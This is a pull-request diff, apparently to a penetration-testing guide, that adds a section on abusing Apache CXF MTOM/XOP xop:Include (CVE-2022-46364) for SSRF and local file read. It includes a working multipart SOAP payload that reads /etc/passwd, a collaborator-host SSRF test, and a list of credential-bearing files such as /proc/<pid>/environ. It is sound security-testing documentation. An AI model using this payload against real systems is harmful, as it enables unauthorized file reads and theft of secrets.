Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -28,6 +28,51 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th
- **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing.
- **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions.

### Apache CXF MTOM/XOP `xop:Include` as file-read / SSRF primitive

If a SOAP service uses **Apache CXF** with **MTOM/XOP** enabled, test whether a parameter accepts an inline `xop:Include` element inside a **`multipart/related`** request whose root part is **`application/xop+xml`**. Apache's advisory for **CVE-2022-46364** states vulnerable versions parse the `href` of `XOP:Include` in MTOM requests and can perform SSRF-style fetches.

Why this matters in practice:

- Many testers try only plain `text/xml` SOAP bodies and miss that the vulnerable code path is reached only after switching to **MIME multipart + XOP**.
- If the application **reflects** the affected parameter in the SOAP response, the SSRF primitive can become **arbitrary local file read** by using `file://`.
- Even without reflection, `http://`/`https://` targets can still be useful for **blind SSRF** against internal services.

Minimal structure to adapt to the target operation:

```http
POST /service HTTP/1.1
Content-Type: multipart/related; type="application/xop+xml"; start="<root.message@cxf.apache.org>"; boundary="MIME_boundary"

--MIME_boundary
Content-Type: application/xop+xml; charset=UTF-8; type="text/xml"
Content-ID: <root.message@cxf.apache.org>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xop="http://www.w3.org/2004/08/xop/include">
<soap:Body>
<ns:OPERATION xmlns:ns="http://target/">
<ns:PARAM><xop:Include href="file:///etc/passwd"/></ns:PARAM>
</ns:OPERATION>
</soap:Body>
</soap:Envelope>
--MIME_boundary--
```

Practical triage:

1. Identify CXF version from the JAR, error pages, banners, or decompiled service artifacts.
2. Generate a valid SOAP request first (`?wsdl`, SoapUI, Burp WSDLer, traced client, decompiled stubs).
3. Convert the request to **`multipart/related`** and replace a parameter value with `xop:Include`.
4. Test `file:///etc/passwd` for reflection-based reads and `http://<collaborator>` for SSRF.

After obtaining local file read, high-value targets often include:

- **systemd units** in `/etc/systemd/system/` and `/lib/systemd/system/` for `ExecStart=`, `EnvironmentFile=`, usernames, bind addresses, and credentials passed on the command line
- **`/proc/<pid>/cmdline`** to recover full launch arguments of interesting services
- **`/proc/<pid>/environ`** to recover secrets injected as environment variables
- service-specific config, env, or wrapper scripts referenced by the unit file

### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls

Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`.
Expand Down Expand Up @@ -101,5 +146,8 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0

- [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
- [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study)
- [Apache CXF advisory for CVE-2022-46364](https://cxf.apache.org/security-advisories.data/CVE-2022-46364.txt)
- [Apache CXF security advisories](https://cxf.apache.org/security-advisories.html)
- [0xdf - HTB DevArea](https://0xdf.gitlab.io/2026/07/04/htb-devarea.html)

{{#include ../../banners/hacktricks-training.md}}